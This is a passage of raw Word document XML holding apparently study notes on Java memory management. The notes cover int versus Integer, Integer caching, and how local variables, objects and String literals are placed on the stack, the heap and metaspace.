        <w:t xml:space="preserve"> in Java </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57761EEC"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A4872E">
          <v:rect id="_x0000_i1268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D30E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vs Integer — Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A00B5"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Primitive Type)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A0414"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Stack (if used as local variable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1B7BC9"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footprint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568A610"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n object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, just a value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB777B3"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emory overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77D73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F88DE0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 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAAC74"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is stored in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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476A5EC"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st access and least memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8290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E2D7DC">
          <v:rect id="_x0000_i1269" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DAA04D"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Wrapper Class for int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59446AA2"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Heap (as it's an object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BBBFB0"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a reference in stack, object in heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB59FED"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memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than int (due to object metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC50A89"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s, useful in collections (like List&lt;Integer&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131EF8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BEEC0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b = new Integer(10); // discouraged, use valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70B3A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c = Integer.valueOf(10); // preferred way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A9374F"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Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABB8E2A" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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aches values from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-128 to 127</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849D18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x = Integer.valueOf(127);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F6F91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y = Integer.valueOf(127);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BE95C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x == y); // true, same cached object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458617B8" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC7E81" w:rsidP="0079106A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4448BF7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m = Integer.valueOf(128);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5247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n = Integer.valueOf(128);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5084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 == n); // false, different objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C63B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7FFF59">
          <v:rect id="_x0000_i1270" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="045A32F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1498"/>
        <w:gridCol w:w="2900"/>
      </w:tblGrid>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6D3843B8" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13629650"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2D2758"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074B4239"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ger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6BF6A4E4" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228AE0D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44E00FF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itive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D04BB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apper class (Object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="6F09DEB7" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7020BC1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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DD4C9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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ED1507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object), stack (reference)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="41754644" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68B216E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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13248E1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bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6B75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object overhead)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="2C9E9AD0" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B156583"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Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE41F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6086C0C8"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79106A" w:rsidRPr="00CE4B95" w14:paraId="31D86357" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BA5F574"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 Collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C63F7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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387D169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owed (List&lt;Integer&gt;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0079106A" w:rsidRPr="00CE4B95" w14:paraId="28CEB1DB" w14:textId="77777777" w:rsidTr="00CC7E81">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5567DB3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boxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C50D7CC"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14735D4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can convert from int)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C89ED7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73A685">
          <v:rect id="_x0000_i1271" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267859B"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087D7EED"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 xml:space="preserve"> for performance &amp; simple numeric logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517B0810"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when dealing with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like in generics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F12FF7" w14:textId="77777777" w:rsidR="00CC7E81" w:rsidRPr="00CE4B95"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F7AA0A"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9" w:name="_Toc197867313"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where local variables are stored in memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="55D1A4A9" w14:textId="24773720" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435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in Java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 xml:space="preserve">. Here's a detailed explanation </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>👇</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A6D74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78674">
          <v:rect id="_x0000_i1273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D0673"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Local Variables Stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D2CD8"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Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DFD62"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like method parameters or variables declared inside methods) are stored in the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xml:space="preserve"> of the executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E8B2C"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method call creates a new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and local variables are created inside that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDC01F"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method finishes, its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack frame is removed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and local variables go out of scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D20346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DE27E">
          <v:rect id="_x0000_i1274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17868C9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FCD23E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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7F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72FB29"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 = 10; // Local variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A1875"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 = "Hello"; // Local reference variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1728FBB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 // Local reference to object in heap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CC88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B606B1"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2B5C62" w14:textId="77777777" w:rsidR="00DD4446" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD4446" w:rsidP="0056435E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328422A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123113E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5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4DB6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F20CDC"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imitive) → stored directly in stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E412F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 → reference in stack, "Hello" (String literal) is in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heap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B751D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 → reference in stack, object itself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4ACA5D1F"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6B7CB">
          <v:rect id="_x0000_i1275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50634FD1"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612"/>
        <w:gridCol w:w="2661"/>
      </w:tblGrid>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="5E5B4901" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF9F1C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BDF606"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719438F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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="4FAE6944" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F0C9862"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="513ECC7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variables, method calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71366ADC"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lass instances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="6829F8F2" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71092C8B"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0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FEBE5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52D8F48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6435E" w:rsidRPr="00CE4B95" w14:paraId="543679B2" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D40393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13DF38D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method execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7594456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no reference (GC eligible)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0056435E" w:rsidRPr="00CE4B95" w14:paraId="2DB4D82F" w14:textId="77777777" w:rsidTr="00DD4446">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48E78B6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75DB3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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765172F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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71F13BD6" w14:textId="7F9A9993"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BFD4DB3">
          <v:rect id="_x0000_i1276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BFFACC"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100" w:name="_Toc197867314"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where objects will be stored in memory?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="669BB901" w14:textId="4F85AE6D" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655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7F15454F"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F4DD3F">
          <v:rect id="_x0000_i1277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10E1C1"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objects stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1A54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 All objects created using new keyword (or implicitly via boxing, collections, etc.) are stored in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721E2127"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AD6C">
          <v:rect id="_x0000_i1278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAD440"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DD5120"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4C7E031A"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model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949EB6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D91BB9" w14:textId="77777777" w:rsidR="0055738D" w:rsidRPr="00CE4B95" w:rsidRDefault="0055738D" w:rsidP="0028655A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B09565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042CC35"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A0DD8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r c = new Car(); // Object stored in heap, reference 'c' stored in stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E65F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9C4B7"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7C6531"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r object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5C42D1EE"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c (which points to the object) is stored in th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n the method's stack frame).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C7C18"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820BE2">
          <v:rect id="_x0000_i1279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B15605"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269"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="041BEEB4" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="023DEB97"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Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C83B74E"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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="0FDE7D16" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA11ED2"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4628374E"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local variables, references to objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="79762794" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65716EFC"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BBBAA04"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objects, instance variables, arrays, Strings (non-literals)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028655A" w:rsidRPr="00CE4B95" w14:paraId="246568D5" w14:textId="77777777" w:rsidTr="0055738D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44D9479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 (MetaSpace in Java 8+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9C11D8"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level data, static variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6173734B"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EBC7C">
          <v:rect id="_x0000_i1280" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="251ADBC4"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ecial Case: String Literals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126DA7AD"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 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6578A"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llo" is stored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which is part of the heap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B190BBF"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 is a reference in the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B7B9C3" w14:textId="55319F36"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EDB7C05">
          <v:rect id="_x0000_i1281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AAE32" w14:textId="59EA39A4" w:rsidR="00022CC0" w:rsidRPr="00CE4B95" w:rsidRDefault="00022CC0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc197867315"/>
